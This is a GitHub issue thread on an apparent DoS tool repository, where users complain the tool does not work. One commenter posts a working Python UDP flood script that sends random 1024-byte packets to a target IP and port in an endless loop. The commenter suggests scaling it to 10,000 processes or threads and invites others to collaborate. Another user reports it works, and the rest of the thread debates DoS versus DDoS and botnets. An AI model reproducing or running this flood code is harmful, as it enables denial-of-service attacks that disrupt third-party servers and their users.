Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

help #4

Closed
ctkqiang opened this issue Nov 8, 2018 · 29 comments
Closed

help #4

ctkqiang opened this issue Nov 8, 2018 · 29 comments

Comments

@ctkqiang
Copy link

ctkqiang commented Nov 8, 2018

import sys

import os

In Pycharm it shows error.

@kingxiaofire
Copy link

It can't work, can you help me ,please.

@ctkqiang
Copy link
Author

It can't work, can you help me ,please.

Same Here, I hope developer look at our report.

@kingxiaofire
Copy link

Maybe it worked, but not hard enough;I tested with the following codes:
import sys
import socket
import random
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1024)
ip = 'xx.xx.xx.xx'
port = 80
sent = 1
while True:
sock.sendto(bytes, (ip,port))
#print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
sent = sent + 1

So here's the result:
wechatdf04748280447d5e97a3c9a592a400b6

So, I think you can set up 10,000 processes and execute this script together, which should be possible, if you're interested, contact me and we'll work on it together.

@ctkqiang
Copy link
Author

Wow , I shall test it .

@ctkqiang
Copy link
Author

@kingxiaofire it works as you said ! Thanks man!

@kingxiaofire
Copy link

But I think this is not enough, but if you can run it in multiple threads, it should be no problem.

@ctkqiang
Copy link
Author

But I think this is not enough, but if you can run it in multiple threads, it should be no problem.

By the way , it 's possible to do this on IPv4 and Ipv6 addr ?

@kingxiaofire
Copy link

I only have IPV4 available for testing here, but I think that as long as UDP is for IPV6, it should be OK.

@wooyunwang
Copy link

Actually, this script is the dos, not ddos!!!

@ctkqiang
Copy link
Author

Actually, this script is the dos, not ddos!!!

Yeap it is DOS. If i'm not wrong, dDos is something that is related to botnet.....

@wooyunwang
Copy link

Actually, this script is the dos, not ddos!!!

Yeap it is DOS. If i'm not wrong, dDos is something that is related to botnet.....

If i want to start a dos, i would rather use burpsuite than this sdupid Ha3Mrx.

@ctkqiang
Copy link
Author

burpsuite

Interesting, What is 'burpsuite'? Mind to educate me tho? Honestly , I am so much to learn on this.

@j0ck3r2004
Copy link

First of all this is not a ddos tool because with ddos you infect computers with malware and make them attack the site.This tool is just connecting and sending bytes to the site so the server myst be very shitie to crash also burpsuit is for bruteforcing webpage's logins i dont this it is for dos attacks

@j0ck3r2004
Copy link

also i think this is for http only (80)

@ctkqiang
Copy link
Author

ctkqiang commented Jan 9, 2019

First of all this is not a ddos tool because with ddos you infect computers with malware and make them attack the site.This tool is just connecting and sending bytes to the site so the server myst be very shitie to crash also burpsuit is for bruteforcing webpage's logins i dont this it is for dos attacks

Yeap. As we had already reliase this and debating about this. This is a DOS rather than dDOS. But the person who posted this is not aware of what we discuss here.

@Clay911
Copy link

Clay911 commented Jan 28, 2019

Apakah dos dan ddos bisa di jadikan 1 ?

@ctkqiang
Copy link
Author

@Clay911 With all due respect, English please.

@Clay911
Copy link

Clay911 commented Jan 28, 2019 via email

@j0ck3r2004
Copy link

@Clay911 Yes because the ddos attack is the result of dos attack and malware infections like that
ddosattack

@Clay911
Copy link

Clay911 commented Jan 28, 2019 via email

@j0ck3r2004
Copy link

@Clay911 first of all i am pretty sure that you do dos attacks and yes it can take down servers with good security but you will need multiple attacks the same time with ddos

@Clay911
Copy link

Clay911 commented Jan 28, 2019 via email

@Clay911
Copy link

Clay911 commented Jan 28, 2019 via email

@j0ck3r2004
Copy link

@Clay911 no i dont mean that you just have to apply attacks from different computers the same time thats how it works look a the previous photo

@gurachan
Copy link

whats with +1 port?

@TrisuDL
Copy link

TrisuDL commented Jul 28, 2019

If the fking issue is soleved cloae the issue then

@ctkqiang
Copy link
Author

ctkqiang commented Aug 9, 2019

If the fking issue is soleved cloae the issue then

@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@ctkqiang ctkqiang reopened this Aug 9, 2019
@ctkqiang ctkqiang closed this as completed Aug 9, 2019
@manexmane21
Copy link

hlo

@hackneyyard
Copy link

DDos is not being accessed
can anyone tell me why

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants